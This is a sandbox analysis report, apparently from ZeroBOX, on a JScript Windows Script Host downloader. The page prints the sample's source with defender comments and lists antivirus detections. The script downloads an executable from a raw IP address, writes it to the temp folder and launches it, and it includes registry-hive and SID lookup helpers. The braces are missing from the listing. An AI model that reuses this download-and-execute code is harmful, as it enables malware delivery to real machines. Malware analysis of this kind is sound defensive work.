Static | ZeroBOX
No static analysis available.
// Top-level driver of a Windows Script Host (JScript) downloader, as captured in a sandbox report.
// NOTE(review): the report extraction dropped lines here (the `try {` opener and several
// closing braces are missing), so the listing is not runnable as shown and the exact nesting
// of the statements below cannot be confirmed from this page.
// `fs` and `shell` are created but not referenced by any of the visible top-level lines.
var fs = new ActiveXObject("Scripting.FileSystemObject");
var shell = new ActiveXObject("WScript.Shell");
// Hard-coded payload location: plain HTTP, raw IP address, .exe file name.
// This string is the network indicator for the sample.
var url = "http://165.22.242.147/builds/1.exe";
// Destination folder is read from the script argument at index 1 (the second argument).
// `to` is assigned without `var`, so it becomes an implicit global.
to = WScript.Arguments(1);
} catch(err) {
// A missing argument raises an error; the handler falls back to "no destination given".
to = null;
if (!to) {
// With no destination supplied, use GetSpecialFolder(2), which is the temporary folder
// in the FileSystemObject API, so the payload is written under the temp directory.
myObject = new ActiveXObject("Scripting.FileSystemObject");
name = myObject.GetSpecialFolder(2);
to = name;
// The process exit code mirrors download(): 0 when it returns a truthy value, 1 otherwise.
if (download(url, to)) {
WScript.Quit(0);
} else {
WScript.Quit(1);
/**
 * Fetches `url` over HTTP, writes the response body to a file inside folder `to`,
 * and then launches that file.
 *
 * NOTE(review): closing braces were lost in the report extraction, so the nesting of the
 * statements below (and where a failure path would return) cannot be confirmed from this page.
 *
 * Defender notes: the response is executed with no integrity or signature check, and the
 * sequence is "script host issues an HTTP GET, writes a file, then starts it". Those are the
 * behaviours to look for in process-creation and file-write telemetry.
 *
 * @param {string} url  Address of the file to fetch; its last path segment becomes the file name.
 * @param {string} to   Destination folder; created when it does not exist.
 * @param {Object} [opts]  Defaulted to {} but not read by any visible line.
 * @returns {boolean} true after the file has been saved and launched (only return visible here).
 */
function download(url, to, opts) {
opts = opts || {};
var fs = new ActiveXObject("Scripting.FileSystemObject");
var http = new ActiveXObject("MSXML2.ServerXMLHTTP.3.0");
var path = fs.getAbsolutePathName(to);
// Everything after the last "/" of the URL is used as the local file name.
var filename = /([^\/]*)$/.exec(url)[1];
var filepath = fs.BuildPath(path, filename);
// Option 2 with value 13056 tells ServerXMLHTTP to ignore all server certificate errors.
// It has no effect on the plain-HTTP URL the driver passes in, but it would disable TLS
// validation for any https:// URL given to this function.
http.setOption(2,13056);
if (!fs.FolderExists(path)) {
// Create the folder if it does not exist
fs.CreateFolder(path);
// Synchronous GET (third argument false): send() blocks until the response has arrived.
http.open("GET", url, false);
http.send();
// Only 2xx responses are written to disk.
if (http.status >= 200 && http.status < 300) {
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
// Type 1 is binary mode, so the body is stored byte-for-byte.
Stream.Type = 1;
Stream.Write(http.responseBody);
Stream.Position = 0;
// Any existing file of the same name is deleted, then the stream is saved with
// option 2 (create or overwrite).
if (fs.FileExists(filepath))
fs.DeleteFile(filepath);
Stream.SaveToFile(filepath, 2);
Stream.Close();
// The saved file is started straight away through WScript.Shell.Run.
var WSH = new ActiveXObject("WScript.Shell");
WSH.run(filepath);
return true;
/**
 * Returns the value of the %COMPUTERNAME% environment variable, expanded through WScript.Shell.
 * Not called by any line visible in this listing.
 * NOTE(review): the closing brace is missing from the extracted listing.
 *
 * @returns {string} The expanded %COMPUTERNAME% string.
 */
function getComputerName() {
var oShell = new ActiveXObject("WScript.Shell");
return oShell.ExpandEnvironmentStrings("%COMPUTERNAME%");
/**
 * Looks up a Win32_UserAccount instance through a WMI moniker and returns its SID property.
 * Not called by any line visible in this listing.
 * NOTE(review): the closing brace is missing from the extracted listing.
 *
 * @param {string} strUser    Account name placed in the moniker's Name key.
 * @param {string} strDomain  Domain placed in the moniker's Domain key.
 * @returns {string} The SID property of the matched account object.
 */
function getSID(strUser, strDomain) {
// Both values are concatenated into the moniker unescaped, so a single quote in either
// one changes the object path that WMI resolves.
var oAccount = GetObject("winmgmts:root/cimv2:Win32_UserAccount.Name='" + strUser + "',Domain='" + strDomain + "'");
return oAccount.SID;
/**
 * Reads the ProfileImagePath registry value for a SID from the HKLM ProfileList key.
 * Not called by any line visible in this listing.
 * NOTE(review): the closing brace is missing from the extracted listing.
 *
 * @param {string} strSID  SID used as the ProfileList subkey name.
 * @returns {string} The value returned by RegRead for ProfileImagePath.
 */
function getProfilePath(strSID) {
var oShell = new ActiveXObject("WScript.Shell");
var strValue = oShell.RegRead("HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + strSID + "\\ProfileImagePath");
return strValue;
/**
 * Reads the AppData entry of "User Shell Folders" from a user's hive under HKEY_USERS.
 * Not called by any line visible in this listing.
 * NOTE(review): the closing brace is missing from the extracted listing.
 *
 * @param {string} strSID  Subkey name under HKEY_USERS whose AppData value is read.
 * @returns {string} The value returned by RegRead for AppData.
 */
function getAppData(strSID) {
var oShell = new ActiveXObject("WScript.Shell");
var strValue = oShell.RegRead("HKEY_USERS\\" + strSID + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\AppData");
return strValue;
/**
 * Runs `reg load` to mount a registry hive file under HKU\<strKeyName>.
 * Not called by any line visible in this listing.
 * NOTE(review): the closing brace is missing from the extracted listing.
 *
 * @param {string} strKeyName   Key name to create under HKU.
 * @param {string} strHiveFile  Path of the hive file to load.
 */
function loadHKUHive(strKeyName, strHiveFile) {
var oShell = new ActiveXObject("WScript.Shell");
// Window style 0 hides the console window; `true` waits for reg.exe to exit.
// Both arguments are concatenated into the command line without quoting, so a value
// containing spaces or extra tokens changes the command that is executed.
oShell.Run("reg load HKU\\" + strKeyName + " " + strHiveFile, 0, true);
/**
 * Runs `reg unload` to detach the hive mounted at HKU\<strKeyName>.
 * Not called by any line visible in this listing.
 * NOTE(review): the closing brace is missing from the extracted listing.
 *
 * @param {string} strKeyName  Key name under HKU to unload.
 */
function unloadHKUHive(strKeyName) {
var oShell = new ActiveXObject("WScript.Shell");
// Window style 0 hides the console window; `true` waits for reg.exe to exit.
// strKeyName is concatenated into the command line without quoting.
oShell.Run("reg unload HKU\\" + strKeyName, 0, true);
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren JS/Agent.SU!Eldorado
Symantec ISB.Downloader!gen60
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro HEUR_HTMJS.D
McAfee-GW-Edition BehavesLike.JS.Exploit.xm
CMC Clean
Emsisoft Clean
GData Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet JS/Agent.OFV!tr.dldr
AVG Clean
Panda Clean
No IRMA results available.